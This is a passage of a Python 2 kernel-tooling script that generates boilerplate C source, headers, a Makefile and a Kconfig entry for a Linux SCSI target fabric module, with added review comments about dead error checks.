    buf += " .get_fabric_proto_ident = " + fabric_mod_name + "_get_fabric_proto_ident,\n"
    buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
    buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
    buf += " .tpg_get_default_depth = " + fabric_mod_name + "_get_default_depth,\n"
    buf += " .tpg_get_pr_transport_id = " + fabric_mod_name + "_get_pr_transport_id,\n"
    buf += " .tpg_get_pr_transport_id_len = " + fabric_mod_name + "_get_pr_transport_id_len,\n"
    buf += " .tpg_parse_pr_out_transport_id = " + fabric_mod_name + "_parse_pr_out_transport_id,\n"
    buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
    buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
    buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
    buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
    buf += " .tpg_alloc_fabric_acl = " + fabric_mod_name + "_alloc_fabric_acl,\n"
    buf += " .tpg_release_fabric_acl = " + fabric_mod_name + "_release_fabric_acl,\n"
    buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
    buf += " .release_cmd_to_pool = " + fabric_mod_name + "_release_cmd,\n"
    buf += " .release_cmd_direct = " + fabric_mod_name + "_release_cmd,\n"
    buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
    buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
    buf += " .stop_session = " + fabric_mod_name + "_stop_session,\n"
    buf += " .fall_back_to_erl0 = " + fabric_mod_name + "_reset_nexus,\n"
    buf += " .sess_logged_in = " + fabric_mod_name + "_sess_logged_in,\n"
    buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
    buf += " .sess_get_initiator_sid = NULL,\n"
    buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
    buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
    buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
    buf += " .get_task_tag = " + fabric_mod_name + "_get_task_tag,\n"
    buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
    buf += " .new_cmd_failure = " + fabric_mod_name + "_new_cmd_failure,\n"
    buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
    buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
    buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
    buf += " .get_fabric_sense_len = " + fabric_mod_name + "_get_fabric_sense_len,\n"
    buf += " .set_fabric_sense_len = " + fabric_mod_name + "_set_fabric_sense_len,\n"
    buf += " .is_state_remove = " + fabric_mod_name + "_is_state_remove,\n"
    buf += " .pack_lun = " + fabric_mod_name + "_pack_lun,\n"
    buf += " /*\n"
    buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
    buf += " */\n"
    buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
    buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
    buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
    buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
    buf += " .fabric_post_link = NULL,\n"
    buf += " .fabric_pre_unlink = NULL,\n"
    buf += " .fabric_make_np = NULL,\n"
    buf += " .fabric_drop_np = NULL,\n"
    buf += " .fabric_make_nodeacl = " + fabric_mod_name + "_make_nodeacl,\n"
    buf += " .fabric_drop_nodeacl = " + fabric_mod_name + "_drop_nodeacl,\n"
    buf += "};\n\n"

    # Note: the configfs group name drops the leading "tcm_" prefix via
    # fabric_mod_name[4:].
    buf += "static int " + fabric_mod_name + "_register_configfs(void)\n"
    buf += "{\n"
    buf += " struct target_fabric_configfs *fabric;\n"
    buf += " int ret;\n\n"
    buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
    buf += " \" on \"UTS_RELEASE\"\\n\"," + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
    buf += " utsname()->machine);\n"
    buf += " /*\n"
    buf += " * Register the top level struct config_item_type with TCM core\n"
    buf += " */\n"
    buf += " fabric = target_fabric_configfs_init(THIS_MODULE, \"" + fabric_mod_name[4:] + "\");\n"
    buf += " if (!(fabric)) {\n"
    buf += " printk(KERN_ERR \"target_fabric_configfs_init() failed\\n\");\n"
    buf += " return -ENOMEM;\n"
    buf += " }\n"
    buf += " /*\n"
    buf += " * Setup fabric->tf_ops from our local " + fabric_mod_name + "_ops\n"
    buf += " */\n"
    buf += " fabric->tf_ops = " + fabric_mod_name + "_ops;\n"
    buf += " /*\n"
    buf += " * Setup default attribute lists for various fabric->tf_cit_tmpl\n"
    buf += " */\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_wwn_cit.ct_attrs = " + fabric_mod_name + "_wwn_attrs;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_base_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_attrib_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_param_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_np_base_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_base_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_attrib_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_auth_cit.ct_attrs = NULL;\n"
    buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_param_cit.ct_attrs = NULL;\n"
    buf += " /*\n"
    buf += " * Register the fabric for use within TCM\n"
    buf += " */\n"
    buf += " ret = target_fabric_configfs_register(fabric);\n"
    buf += " if (ret < 0) {\n"
    buf += " printk(KERN_ERR \"target_fabric_configfs_register() failed\"\n"
    buf += " \" for " + fabric_mod_name.upper() + "\\n\");\n"
    buf += " return ret;\n"
    buf += " }\n"
    buf += " /*\n"
    buf += " * Setup our local pointer to *fabric\n"
    buf += " */\n"
    buf += " " + fabric_mod_name + "_fabric_configfs = fabric;\n"
    buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Set fabric -> " + fabric_mod_name + "_fabric_configfs\\n\");\n"
    buf += " return 0;\n"
    buf += "};\n\n"

    buf += "static void " + fabric_mod_name + "_deregister_configfs(void)\n"
    buf += "{\n"
    buf += " if (!(" + fabric_mod_name + "_fabric_configfs))\n"
    buf += " return;\n\n"
    buf += " target_fabric_configfs_deregister(" + fabric_mod_name + "_fabric_configfs);\n"
    buf += " " + fabric_mod_name + "_fabric_configfs = NULL;\n"
    buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Cleared " + fabric_mod_name + "_fabric_configfs\\n\");\n"
    buf += "};\n\n"

    buf += "static int __init " + fabric_mod_name + "_init(void)\n"
    buf += "{\n"
    buf += " int ret;\n\n"
    buf += " ret = " + fabric_mod_name + "_register_configfs();\n"
    buf += " if (ret < 0)\n"
    buf += " return ret;\n\n"
    buf += " return 0;\n"
    buf += "};\n\n"
    buf += "static void " + fabric_mod_name + "_exit(void)\n"
    buf += "{\n"
    buf += " " + fabric_mod_name + "_deregister_configfs();\n"
    buf += "};\n\n"

    buf += "#ifdef MODULE\n"
    buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
    buf += "MODULE_LICENSE(\"GPL\");\n"
    buf += "module_init(" + fabric_mod_name + "_init);\n"
    buf += "module_exit(" + fabric_mod_name + "_exit);\n"
    buf += "#endif\n"

    # NOTE(review): on Python 2 file.write() returns None, so this "write
    # failed" check can never fire (and on Python 3, where write() returns
    # the character count, it would always fire).
    ret = p.write(buf)
    if ret:
        tcm_mod_err("Unable to write f: " + f)
    p.close()
    return
def tcm_mod_scan_fabric_ops(tcm_dir):
    """Populate the module-level fabric_ops list from the kernel header.

    Reads include/target/target_core_fabric_ops.h line by line and
    appends (rstrip'd) every line containing a '(*' function-pointer
    declaration.  Scanning runs to end of file -- there is no check for
    the struct's closing brace.
    """
    fabric_ops_api = tcm_dir + "include/target/target_core_fabric_ops.h"
    print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
    process_fo = 0;
    p = open(fabric_ops_api, 'r')

    line = p.readline()
    while line:
        # Before collection starts, skip the struct header line itself.
        if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
            line = p.readline()
            continue
        # First non-header line flips into collection mode.
        # NOTE(review): the line that triggered this branch is itself never
        # tested for a function pointer -- presumably harmless given the
        # header's layout, but worth confirming.
        if process_fo == 0:
            process_fo = 1;
            line = p.readline()
            # Search for function pointer
            if not re.search('\(\*', line):
                continue
            fabric_ops.append(line.rstrip())
            continue
        line = p.readline()
        # Search for function pointer
        if not re.search('\(\*', line):
            continue
        fabric_ops.append(line.rstrip())

    p.close()
    return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
    """Generate <fabric_mod_name>_fabric.c / _fabric.h handler stubs.

    For each function-pointer line previously collected into the global
    fabric_ops list by tcm_mod_scan_fabric_ops(), emits a stub handler
    definition into buf (the .c file) and a matching prototype into bufi
    (the .h file).  Protocol-specific handlers (transport IDs, fabric
    proto ident) dispatch to the fc_/sas_/iscsi_ helpers selected by
    proto_ident.  Uses the module-level globals fabric_mod_port and
    fabric_ops.
    """
    buf = ""
    bufi = ""

    f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
    print "Writing file: " + f
    p = open(f, 'w')
    # NOTE(review): dead check -- open() raises on failure rather than
    # returning a falsy object.
    if not p:
        tcm_mod_err("Unable to open file: " + f)

    fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
    print "Writing file: " + fi
    pi = open(fi, 'w')
    if not pi:
        tcm_mod_err("Unable to open file: " + fi)

    buf = "#include <linux/slab.h>\n"
    buf += "#include <linux/kthread.h>\n"
    buf += "#include <linux/types.h>\n"
    buf += "#include <linux/list.h>\n"
    buf += "#include <linux/types.h>\n"
    buf += "#include <linux/string.h>\n"
    buf += "#include <linux/ctype.h>\n"
    buf += "#include <asm/unaligned.h>\n"
    buf += "#include <scsi/scsi.h>\n"
    buf += "#include <scsi/scsi_host.h>\n"
    buf += "#include <scsi/scsi_device.h>\n"
    buf += "#include <scsi/scsi_cmnd.h>\n"
    buf += "#include <scsi/libfc.h>\n\n"
    buf += "#include <target/target_core_base.h>\n"
    buf += "#include <target/target_core_transport.h>\n"
    buf += "#include <target/target_core_fabric_ops.h>\n"
    buf += "#include <target/target_core_fabric_lib.h>\n"
    buf += "#include <target/target_core_device.h>\n"
    buf += "#include <target/target_core_tpg.h>\n"
    buf += "#include <target/target_core_configfs.h>\n\n"
    buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
    buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"

    # check_true/check_false are always emitted; they back the
    # tpg_check_demo_mode* ops in the configfs table.
    buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
    buf += "{\n"
    buf += " return 1;\n"
    buf += "}\n\n"
    bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
    buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
    buf += "{\n"
    buf += " return 0;\n"
    buf += "}\n\n"
    bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"

    total_fabric_ops = len(fabric_ops)
    i = 0
    while i < total_fabric_ops:
        fo = fabric_ops[i]
        i += 1
        # print "fabric_ops: " + fo

        if re.search('get_fabric_name', fo):
            buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
            buf += "{\n"
            buf += " return \"" + fabric_mod_name[4:] + "\";\n"
            buf += "}\n\n"
            bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
            continue

        if re.search('get_fabric_proto_ident', fo):
            buf += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *se_tpg)\n"
            buf += "{\n"
            buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
            buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
            buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
            buf += " u8 proto_id;\n\n"
            buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
            if proto_ident == "FC":
                buf += " case SCSI_PROTOCOL_FCP:\n"
                buf += " default:\n"
                buf += " proto_id = fc_get_fabric_proto_ident(se_tpg);\n"
                buf += " break;\n"
            elif proto_ident == "SAS":
                buf += " case SCSI_PROTOCOL_SAS:\n"
                buf += " default:\n"
                buf += " proto_id = sas_get_fabric_proto_ident(se_tpg);\n"
                buf += " break;\n"
            elif proto_ident == "iSCSI":
                buf += " case SCSI_PROTOCOL_ISCSI:\n"
                buf += " default:\n"
                buf += " proto_id = iscsi_get_fabric_proto_ident(se_tpg);\n"
                buf += " break;\n"
            buf += " }\n\n"
            buf += " return proto_id;\n"
            buf += "}\n\n"
            bufi += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *);\n"

        if re.search('get_wwn', fo):
            buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
            buf += "{\n"
            buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
            buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
            buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
            buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
            buf += "}\n\n"
            bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"

        if re.search('get_tag', fo):
            buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
            buf += "{\n"
            buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
            buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
            buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
            buf += "}\n\n"
            bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"

        if re.search('get_default_depth', fo):
            buf += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *se_tpg)\n"
            buf += "{\n"
            buf += " return 1;\n"
            buf += "}\n\n"
            bufi += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *);\n"

        if re.search('get_pr_transport_id\)\(', fo):
            buf += "u32 " + fabric_mod_name + "_get_pr_transport_id(\n"
            buf += " struct se_portal_group *se_tpg,\n"
            buf += " struct se_node_acl *se_nacl,\n"
            buf += " struct t10_pr_registration *pr_reg,\n"
            buf += " int *format_code,\n"
            buf += " unsigned char *buf)\n"
            buf += "{\n"
            buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
            buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
            buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
            buf += " int ret = 0;\n\n"
            buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
            if proto_ident == "FC":
                buf += " case SCSI_PROTOCOL_FCP:\n"
                buf += " default:\n"
                buf += " ret = fc_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
                buf += " format_code, buf);\n"
                buf += " break;\n"
            elif proto_ident == "SAS":
                buf += " case SCSI_PROTOCOL_SAS:\n"
                buf += " default:\n"
                buf += " ret = sas_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
                buf += " format_code, buf);\n"
                buf += " break;\n"
            elif proto_ident == "iSCSI":
                buf += " case SCSI_PROTOCOL_ISCSI:\n"
                buf += " default:\n"
                buf += " ret = iscsi_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
                buf += " format_code, buf);\n"
                buf += " break;\n"
            buf += " }\n\n"
            buf += " return ret;\n"
            buf += "}\n\n"
            bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id(struct se_portal_group *,\n"
            bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
            bufi += " int *, unsigned char *);\n"

        if re.search('get_pr_transport_id_len\)\(', fo):
            buf += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(\n"
            buf += " struct se_portal_group *se_tpg,\n"
            buf += " struct se_node_acl *se_nacl,\n"
            buf += " struct t10_pr_registration *pr_reg,\n"
            buf += " int *format_code)\n"
            buf += "{\n"
            buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
            buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
            buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
            buf += " int ret = 0;\n\n"
            buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
            if proto_ident == "FC":
                buf += " case SCSI_PROTOCOL_FCP:\n"
                buf += " default:\n"
                buf += " ret = fc_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
                buf += " format_code);\n"
                buf += " break;\n"
            elif proto_ident == "SAS":
                buf += " case SCSI_PROTOCOL_SAS:\n"
                buf += " default:\n"
                buf += " ret = sas_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
                buf += " format_code);\n"
                buf += " break;\n"
            elif proto_ident == "iSCSI":
                buf += " case SCSI_PROTOCOL_ISCSI:\n"
                buf += " default:\n"
                buf += " ret = iscsi_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
                buf += " format_code);\n"
                buf += " break;\n"
            buf += " }\n\n"
            buf += " return ret;\n"
            buf += "}\n\n"
            bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(struct se_portal_group *,\n"
            bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
            bufi += " int *);\n"

        if re.search('parse_pr_out_transport_id\)\(', fo):
            buf += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(\n"
            buf += " struct se_portal_group *se_tpg,\n"
            buf += " const char *buf,\n"
            buf += " u32 *out_tid_len,\n"
            buf += " char **port_nexus_ptr)\n"
            buf += "{\n"
            buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
            buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
            buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
            buf += " char *tid = NULL;\n\n"
            buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
            if proto_ident == "FC":
                buf += " case SCSI_PROTOCOL_FCP:\n"
                buf += " default:\n"
                buf += " tid = fc_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
                buf += " port_nexus_ptr);\n"
            elif proto_ident == "SAS":
                buf += " case SCSI_PROTOCOL_SAS:\n"
                buf += " default:\n"
                buf += " tid = sas_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
                buf += " port_nexus_ptr);\n"
            elif proto_ident == "iSCSI":
                buf += " case SCSI_PROTOCOL_ISCSI:\n"
                buf += " default:\n"
                buf += " tid = iscsi_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
                buf += " port_nexus_ptr);\n"
            buf += " }\n\n"
            buf += " return tid;\n"
            buf += "}\n\n"
            bufi += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(struct se_portal_group *,\n"
            bufi += " const char *, u32 *, char **);\n"

        if re.search('alloc_fabric_acl\)\(', fo):
            buf += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *se_tpg)\n"
            buf += "{\n"
            buf += " struct " + fabric_mod_name + "_nacl *nacl;\n\n"
            buf += " nacl = kzalloc(sizeof(struct " + fabric_mod_name + "_nacl), GFP_KERNEL);\n"
            buf += " if (!(nacl)) {\n"
            buf += " printk(KERN_ERR \"Unable to alocate struct " + fabric_mod_name + "_nacl\\n\");\n"
            buf += " return NULL;\n"
            buf += " }\n\n"
            buf += " return &nacl->se_node_acl;\n"
            buf += "}\n\n"
            bufi += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *);\n"

        if re.search('release_fabric_acl\)\(', fo):
            buf += "void " + fabric_mod_name + "_release_fabric_acl(\n"
            buf += " struct se_portal_group *se_tpg,\n"
            buf += " struct se_node_acl *se_nacl)\n"
            buf += "{\n"
            buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_nacl,\n"
            buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
            buf += " kfree(nacl);\n"
            buf += "}\n\n"
            bufi += "void " + fabric_mod_name + "_release_fabric_acl(struct se_portal_group *,\n"
            bufi += " struct se_node_acl *);\n"

        if re.search('tpg_get_inst_index\)\(', fo):
            buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
            buf += "{\n"
            buf += " return 1;\n"
            buf += "}\n\n"
            bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"

        if re.search('release_cmd_to_pool', fo):
            buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
            buf += "{\n"
            buf += " return;\n"
            buf += "}\n\n"
            bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"

        if re.search('shutdown_session\)\(', fo):
            buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"

        if re.search('close_session\)\(', fo):
            buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
            buf += "{\n"
            buf += " return;\n"
            buf += "}\n\n"
            bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"

        if re.search('stop_session\)\(', fo):
            buf += "void " + fabric_mod_name + "_stop_session(struct se_session *se_sess, int sess_sleep , int conn_sleep)\n"
            buf += "{\n"
            buf += " return;\n"
            buf += "}\n\n"
            bufi += "void " + fabric_mod_name + "_stop_session(struct se_session *, int, int);\n"

        if re.search('fall_back_to_erl0\)\(', fo):
            buf += "void " + fabric_mod_name + "_reset_nexus(struct se_session *se_sess)\n"
            buf += "{\n"
            buf += " return;\n"
            buf += "}\n\n"
            bufi += "void " + fabric_mod_name + "_reset_nexus(struct se_session *);\n"

        if re.search('sess_logged_in\)\(', fo):
            buf += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *se_sess)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *);\n"

        if re.search('sess_get_index\)\(', fo):
            buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"

        if re.search('write_pending\)\(', fo):
            buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"

        if re.search('write_pending_status\)\(', fo):
            buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"

        if re.search('set_default_node_attributes\)\(', fo):
            buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
            buf += "{\n"
            buf += " return;\n"
            buf += "}\n\n"
            bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"

        if re.search('get_task_tag\)\(', fo):
            buf += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *se_cmd)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *);\n"

        if re.search('get_cmd_state\)\(', fo):
            buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"

        if re.search('new_cmd_failure\)\(', fo):
            buf += "void " + fabric_mod_name + "_new_cmd_failure(struct se_cmd *se_cmd)\n"
            buf += "{\n"
            buf += " return;\n"
            buf += "}\n\n"
            bufi += "void " + fabric_mod_name + "_new_cmd_failure(struct se_cmd *);\n"

        if re.search('queue_data_in\)\(', fo):
            buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"

        if re.search('queue_status\)\(', fo):
            buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"

        if re.search('queue_tm_rsp\)\(', fo):
            buf += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"

        if re.search('get_fabric_sense_len\)\(', fo):
            buf += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void);\n"

        if re.search('set_fabric_sense_len\)\(', fo):
            buf += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *se_cmd, u32 sense_length)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *, u32);\n"

        if re.search('is_state_remove\)\(', fo):
            buf += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *se_cmd)\n"
            buf += "{\n"
            buf += " return 0;\n"
            buf += "}\n\n"
            bufi += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *);\n"

        if re.search('pack_lun\)\(', fo):
            buf += "u64 " + fabric_mod_name + "_pack_lun(unsigned int lun)\n"
            buf += "{\n"
            buf += " WARN_ON(lun >= 256);\n"
            buf += " /* Caller wants this byte-swapped */\n"
            buf += " return cpu_to_le64((lun & 0xff) << 8);\n"
            buf += "}\n\n"
            bufi += "u64 " + fabric_mod_name + "_pack_lun(unsigned int);\n"

    # NOTE(review): on Python 2 file.write() returns None, so these
    # "write failed" checks can never fire (and would misfire on
    # Python 3, where write() returns the character count).
    ret = p.write(buf)
    if ret:
        tcm_mod_err("Unable to write f: " + f)
    p.close()

    ret = pi.write(bufi)
    if ret:
        tcm_mod_err("Unable to write fi: " + fi)
    pi.close()
    return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
    """Generate the Kbuild Makefile for the new fabric module.

    Writes <fabric_mod_dir_var>/Makefile listing the two generated
    object files (_fabric.o, _configfs.o) and the obj-$(CONFIG_...)
    rule for the composite module.

    Parameters:
        fabric_mod_dir_var -- module directory the Makefile is written into
        fabric_mod_name    -- fabric module name, used as identifier prefix
    """
    f = fabric_mod_dir_var + "/Makefile"
    print("Writing file: " + f)

    buf = fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
    buf += " " + fabric_mod_name + "_configfs.o\n"
    buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"

    # BUG FIX: the old `if not p:` / `if ret:` error checks were dead code
    # (open() raises instead of returning falsy; file.write() returns None
    # on Python 2).  A context manager closes the file even on error and
    # lets real I/O failures propagate.
    with open(f, 'w') as p:
        p.write(buf)
    return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
    """Generate the Kconfig entry for the new fabric module.

    Writes <fabric_mod_dir_var>/Kconfig declaring a tristate config
    symbol named after the module (uppercased), depending on
    TARGET_CORE && CONFIGFS_FS.

    Parameters:
        fabric_mod_dir_var -- module directory the Kconfig is written into
        fabric_mod_name    -- fabric module name, used as symbol name
    """
    f = fabric_mod_dir_var + "/Kconfig"
    print("Writing file: " + f)

    buf = "config " + fabric_mod_name.upper() + "\n"
    buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
    buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
    buf += " default n\n"
    buf += " ---help---\n"
    buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"

    # BUG FIX: the old `if not p:` / `if ret:` error checks were dead code
    # (open() raises instead of returning falsy; file.write() returns None
    # on Python 2).  A context manager closes the file even on error and
    # lets real I/O failures propagate.
    with open(f, 'w') as p:
        p.write(buf)
    return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
    # Append the new fabric module's obj-$(CONFIG_...) line to the top-level
    # drivers/target Makefile so the kernel build descends into its directory.
